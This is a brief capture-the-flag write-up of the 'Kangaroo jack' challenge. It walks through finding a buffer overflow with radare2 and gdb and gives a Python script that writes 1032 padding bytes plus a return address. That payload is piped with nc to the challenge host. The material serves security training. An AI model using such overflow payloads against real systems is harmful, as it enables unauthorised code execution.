Kangaroo jack is a simple buffer overflow, we start by opening up the program in radare2
Here we can see that there is a function named
flag, I take a guess that we
need to jump to this function and then the flag will be printed.
I take a look into main to see how large the buffer is, seems it's
Once I know the rough offset, I open the program in gdb, with the
peda toolkit, and use the
function to generate a text string that can be used to determine which length
offset overflows into the RIP register. After a bit of fiddling I found that the
buffer length that overflows into RIP is 1032 (this took some time since going
over 1038 bytes of buffer length would cause a segfault before rdi took a value).
Now we can construct an exploit string to jump to
from struct import pack import socket buf = b"" buf += b"A" * 1032 buf += pack("<Q", 0x400676) with open("overflow.txt", "wb") as f: f.write(buf)
And then send it to the online challenge:
λ cat overflow.txt | nc dolphin.hacking-lab.com 4422 Give me some input and jump!!
Unfortunately this challenge is buggy and sometimes locks up, not giving you the flag.